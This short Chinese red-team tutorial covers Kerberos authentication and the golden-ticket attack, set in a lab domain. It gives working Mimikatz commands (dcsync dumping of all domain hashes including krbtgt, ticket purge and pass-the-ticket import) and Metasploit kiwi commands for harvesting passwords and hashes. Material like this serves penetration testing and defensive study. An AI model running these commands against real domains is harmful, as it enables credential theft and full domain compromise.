Kerberos认证
介绍
Kerberos是一种计算机网络授权协议,用来在非安全网络中,对个人通信以安全的手段进行身份认证。
这个词又指麻省理工学院为这个协议开发的一套计算机软件。
认证流程
提示:
AS(Authentication Server) 认证服务器
KDC(Key Distribution Center) 密钥分发中心
TGT(Ticket Granting Ticket) 票据授权票据(票据的票据)
TGS(Ticket Granting Server) 票据授权服务器
ACL(Access Control Lists) 访问控制列表
DC(Domain Controller) 域控制器
AD(Active Directory) 活动目录
Client 客户端
Server 服务端
详细流程图
黄金票据
原理
在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。
票据条件:
- 域名称
- 域的 SID 值
- 域的 KRBTGT 账号的 HASH
- 伪造D的任意用户名
实验环境
机器:
12server4
AD01
域名:
redteam.club
Mimikatz
12server4上操作
信息收集
前提域管权限#导出hash
privilege::debug
lsadump::dcsync /domain:redteam.club /all /csv(lsadump::lsa /inject)
##一条命令
mimikatz.exe “privilege::debug” “lsadump::dcsync /domain:redteam.club /all /csv” “exit
导入
#清除票据
kerberos::purge
#导入票据
kerberos::ptt C:\Users\ticket.kirbi
Metasploit
12server4上操作
system权限信息收集
#信息收集
load kiwi #导入kiwi模块
##提示:以下需要system权限
creds_all #列举所有凭据
creds_kerberos #列举所有kerberos凭据
kiwi_cmd sekurlsa::logonpasswords #抓密码和hash
域管权限信息收集
#信息收集(需要域管权限)
kiwi_cmd “lsadump::dcsync /domain:redteam.club /user:krbtgt” #krbtgt账户的密码hash值
kerberos_ticket_list #列举kerberos票据
kerberos_ticket_purge #清除kerberos票据
暂无评论内容